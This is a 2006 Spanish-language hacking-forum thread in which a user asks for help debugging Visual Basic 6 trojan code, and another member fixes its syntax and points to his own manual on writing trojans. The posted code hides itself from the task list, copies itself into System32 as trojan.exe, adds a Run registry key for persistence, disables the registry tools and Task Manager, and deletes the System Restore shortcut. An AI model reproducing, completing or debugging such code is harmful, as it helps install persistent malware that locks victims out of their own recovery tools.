elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  que ago mal?
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: que ago mal?  (Leído 1,789 veces)
ugruhell

Desconectado Desconectado

Mensajes: 79


Ver Perfil
que ago mal?
« en: 11 Agosto 2006, 14:44 pm »

Private Sub Timer1_Timer()
App.Taskvisible = False
Filecopy App.Path & "\" & App.EXEname & ".exe" C:\Windows\System32\trojan.exe
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "trojan",
"C:\Windows\System32\" & "\trojan.exe"
Shell "reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword
/d ""1"" /f"
Kill "C:\Documents and Settings\All Users\Menú Inicio\Programas\Accesorios\Herramientas del sistema\Restaurar
sistema.lnk"
Shell "reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d
""1"" /f"
Timer1.Enabled = False

en esta linea de codigo me da error:Filecopy App.Path & "\" & App.EXEname & ".exe" C:\Windows\System32\trojan.exe


y me da algunos errores mas que puede ser?


En línea

WarGhost
I love basket


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: que hago mal?
« Respuesta #1 en: 11 Agosto 2006, 14:45 pm »

Código:
Filecopy App.Path & "\" & App.EXEname & ".exe", "C:\Windows\System32\trojan.exe"


;D salu2


En línea

ugruhell

Desconectado Desconectado

Mensajes: 79


Ver Perfil
Re: que hago mal?
« Respuesta #2 en: 11 Agosto 2006, 14:49 pm »

tenes razon y acà que ago mal?
Shell "reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword
/d ""1"" /f"
En línea

WarGhost
I love basket


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: que hago mal?
« Respuesta #3 en: 11 Agosto 2006, 14:51 pm »

Código:
Shell "reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d ""0"" /f"


;D salu2
En línea

ugruhell

Desconectado Desconectado

Mensajes: 79


Ver Perfil
Re: que hago mal?
« Respuesta #4 en: 11 Agosto 2006, 15:07 pm »

hola warghost estoy leyendo tu manual de programacion de troyanos en vb6.pero no entiendo una cosa como creo el server?por que yo hice todo como està escrito en el manual pero no se como crear el server.
En línea

WarGhost
I love basket


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: que hago mal?
« Respuesta #5 en: 11 Agosto 2006, 15:15 pm »

En ese manual explico como crear un mini troyano en VB y algunos truquillos esta exo un poco chapuza porque no tenia el VB intalado en ese momento  :P.

Hay si que se explica como crear el servidor si te figas en el sección "Creamos nuestro primer troyano" hay dos cosas el cliente y el servidor eso tiene que ir el proyectos diferentes.

;D Salu2
En línea

ugruhell

Desconectado Desconectado

Mensajes: 79


Ver Perfil
Re: que hago mal?
« Respuesta #6 en: 11 Agosto 2006, 15:19 pm »

ha ok muuchas gracias
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines